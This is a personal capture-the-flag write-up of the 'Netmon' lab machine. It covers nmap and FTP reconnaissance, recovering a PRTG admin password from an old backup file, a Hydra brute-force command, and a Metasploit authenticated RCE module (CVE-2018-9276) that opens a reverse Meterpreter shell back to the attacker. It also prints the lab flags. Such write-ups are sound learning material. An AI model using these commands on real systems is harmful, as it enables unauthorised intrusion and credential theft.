Netmon
TARGET IP: 10.10.10.152
HOST IP: 10.10.16.5
RECON
NMAP
Start with NMAP scan.
nmap [Target IP]

More detailed NMAP scan.
nmap -A -p 21,80,135,139,445 [Target IP]

Items to note in scan:
FTP uses Microsoft FTP and allows for anonymous login wit what looks like a lot of directories available for browsing.
Port 80 is open with a title of PRTG Network Monitor (NETMON)
Port 445 is an SMB service with possible default credentials open.
I decided to run a more thorough scan on Port 445 to see what versions of SMB are running to see if I can exploit any of them.
nmap -p 445 --script smb-protocols {TARGET IP]

This shows that
SMBv1
is allowed which isn't supported anymore due to the amount of vulnerabilities. Let's see if we can find any. See the exploits below.
FTP
FTP [Target IP]
Anonymous
<ENTER>
ls

Let's start by downloading any files not nailed down.
For some reason the
.rnd
file couldn't be downloaded and viewing the file was just giving me garbage. Could be encoded.
get .rnd

less .rnd

cd Users
cd Public
get user.txt

On the host system open up the user.txt file for the flag.
cat user.txt
a9436db6e4461212b52f99f40c0767c5
It looks like I can't get access to any other good parts of the system without Administrator privileges.
Digging around more I found some useful credentials in the
/Program Files (x86)/PRTG Network Monitor/cert
directory.

This includes some keys for PRTG. However, after digging around, these look to be mainly used to secure communications and can't be used for login.
Maybe there is a way to monitor or capture traffic that we can then decrypt with the keys?
I grabbed a Log file located on the \
Program Files (x86)\PRTG Network Monitor\PRTG Setup Log.log
file and tried togrep
some key words. I think I got a hit on the admin's email address:
get "PRTG Setup Log.log"
cat "PRTG Setup Log.log" | grep admin

It looks like the admin's email address is
na@na.com
.I have no idea what I can use this for unfortunately.
Finally had to look up a hint. I fucking hate myself right now. Earlier on, I was trying to figure out if there was a way to see hidden files on the FTP server and didn't come across anything other than knowing what the hidden file is called.
I completely spaced on the fact that
ProgramData
is a hidden file on the root directory of Window's systems.Here is a website that tells you where to find the
Data Directory
for the program as well. I just didn't bother trying to access it even though I couldn't see it.
cd ProgramData
cd Paessler
cd "PRTG Network Monitor
In a zip file I found a chunk of information pertaining to the user
prtgadmin
:
</dateformat>
<email>
na@na.com
</email>
<fixed>
1
</fixed>
<grpfoldsize>
10
</grpfoldsize>
<homepage>
/welcome.htm
</homepage>
<lastlogin>
43522.1088048495
</lastlogin>
<login>
prtgadmin
</login>
<name>
PRTG System Administrator
</name>
<ownerid>
100
</ownerid>
<password>
<flags>
<encrypted/>
</flags>
<cell col="0" crypt="PRTG">
JO3Y7LLK7IBKCMDN3DABSVAQO5MR5IDWF3MJLDOWSA======
</cell>
<cell col="1" crypt="PRTG">
OEASMEIE74Q5VXSPFJA2EEGBMEUEXFWW
Looks like the password get's encrypted but I wasn't able to decrypt it using Base64.
It's possible that I could use one of the keys I found to try to decrypt it with
openssl
.
Screw that. I found a file called
PRTG Configuration.old.bak
and grabbed it.
get PRTG Configuration.old.bak
nano PRTG Configuration.old.bak
^W
prtgadmin
PrTg@dmin2018
That didn't work either.
I fucking hate this lab right now. It's 12 at night. I have been banging my head on the table for 8hrs now and this is what it gives me. Lesson learned.
I had to go back to the walkthrough again. Looks like I was in the right area but since this password didn't work, I should instead try variations on it.
I don't think I would have ever figured that out myself. I'll keep it in mind for next time but for fucks sake.
Let's try
PrTg@dmin2019
. Well, what do you fucking no. It worked.
Well, good thing I know how to exploit it from this point on. Now that I have a set of credentials, I can jump over to Metasploit to gain admin privileges. Check out the Exploit notes below.

HTTP
In your web browser:
http://[Target IP]

Looks like we have a login page. Here is the wappalyzer.

Checking out the source code for the page gives us some interesting information.
Unfortunately, nothing that really stood out.
I googled some default credentials for the PRTG Network Monitor and got
prtgadmin:prtgadmin
Unfortunately, none of these worked. I also tried some other usual credentials but no luck. I will come back to this in the enumeration.
I've been beating my head on the table for a while on this one. I eventually checked out the
Forgot Password
link and tried the username credential above,prtgadmin
.

When I try other usernames though, I get the following message. This means that there is definitely a username of
prtgadmin
.

I attempted to use Hydra to brute force the password and came up with a lot of different answers which was wierd. Unfortunately, none of these worked.
hydra -l prtgadmin -P [PATH TO WORDLIST] [TARGET IP] http-post-form "/public/login.htm:username=^USER^&password=^PASS^:Your login has failed. Please try again'!'"

Enumeration
Gobuster
No luck here for some odd reason.
gobuster dir -u http://[Target_IP]/ -w /usr/share/dirb/wordlists/common.txt

I even tried excluding the error codes and wasn't getting anything back.
gobuster dir -u http://[Target_IP]/ -w /usr/share/dirb/wordlists/common.txt -e 302,404,500
Exploit
PRTG
I found an exploit to gain administrator privileges to the system through the PRTG account using CVE-2018-9276. There is also a Metasploit exploit that can leverage this. However, I need to already be logged into an administrator account.
The link above references a CVE-2018-19410 which allows you to create a new admin user account but I only found one written-down POC and it unfortunately did not work for me.
I gained credentials from browsing the FTP site.
prtfadmin:PrTg@dmin2019
Let's jump over to Metasploit to gain admin privileges.
msfconsole
search prtg
use exploit/windows/http/prtg_authenticated_rce
show options
set admin_password PrTg@dmin2019
set rhosts [TARGET IP]
set lhost [HOST IP]
exploit
You should now have a Meterpreter reverse shell. Type the following to get a command shell and verify you are the Administrator.
shell
whoami
SMB
Based on the NMAP scan it shows that SMBv1 is allowed.
I checked to see if it was vulnerable to EternalBlue but no luck using Metasploit.
I also check on a few others.
I also tried logging into the SMBClient with the guest account as the NMAP scan showed it available but it looks as though it has been disabled.

Type the following to see the
root.txt
file.
type C:\Users\Administrator\Desktop\root.txt
adb0e6563ee3febfeb2f0f5ef82e9dcc

Last updated